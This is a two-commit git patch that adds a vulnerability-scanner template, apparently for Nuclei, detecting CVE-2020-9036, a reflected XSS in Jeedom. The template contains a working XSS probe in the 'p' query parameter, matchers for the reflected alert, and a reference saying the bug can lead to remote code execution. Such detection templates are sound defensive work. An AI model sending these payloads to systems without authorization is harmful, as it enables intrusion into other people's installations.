From 6f91b5d0529aae7a433ef4ef9b440d188df024fd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 13:45:01 +0700 Subject: [PATCH 1/2] Create CVE-2020-9036.yaml --- cves/2020/CVE-2020-9036.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-9036.yaml diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml new file mode 100644 index 0000000000..1b757a456f --- /dev/null +++ b/cves/2020/CVE-2020-9036.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-9036 + +info: + name: Jeedom through 4.0.38 allows XSS. + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9036 + tags: cve,cve2020,xss,jeedom + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22" + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(document.domain)' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 142eb2fe3b529291862b0efd96d9433a0eb23545 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 27 Jul 2021 17:12:32 +0530 Subject: [PATCH 2/2] Update CVE-2020-9036.yaml --- cves/2020/CVE-2020-9036.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 1b757a456f..30caec3bae 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -1,10 +1,12 @@ id: CVE-2020-9036 info: - name: Jeedom through 4.0.38 allows XSS. + name: Jeedom through 4.0.38 allows XSS author: pikpikcu severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9036 + reference: | + - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom requests: @@ -16,7 +18,7 @@ requests: matchers: - type: word words: - - 'alert(document.domain)' + - '' part: body - type: status